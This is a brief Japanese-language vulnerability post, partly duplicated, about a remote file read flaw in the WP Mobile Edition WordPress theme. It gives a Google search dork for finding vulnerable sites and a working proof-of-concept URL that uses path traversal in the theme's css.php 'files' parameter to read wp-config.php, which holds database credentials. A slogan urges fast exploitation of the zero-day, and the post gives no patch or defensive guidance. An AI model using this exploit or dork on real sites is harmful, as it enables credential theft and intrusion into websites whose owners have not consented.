WP Mobile Editionプラグインリモートファイル読み込み脆弱性
547 ワード
概要:WP Mobile EditionはWordPressの携帯電話のテーマで、ユーザーの携帯電話がアクセスする時、ウェブサイトを開くのは携帯電話版で、使いやすくてインタフェースが友好的で多くの個人と会社に使用されています.
WP Mobile Editionはそのパラメータをフィルタリングしていないため、今回の脆弱性が発生した.特定の開始ファイル
Googlehackingキーワード
POC:
0 day、スピードでLへ
CopyRight www.sitedirsec.com, Wild Dylan copy at 2015-4-24
WP Mobile Editionはそのパラメータをフィルタリングしていないため、今回の脆弱性が発生した.特定の開始ファイル
themes/mTheme-Unus/css/css.php Googlehackingキーワード
inurl:?fdx_switcher=mobile POC:
wp-config.phpファイルソースコードの読み込みhttp://www.sitedirsec.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php
0 day、スピードでLへ
CopyRight www.sitedirsec.com, Wild Dylan copy at 2015-4-24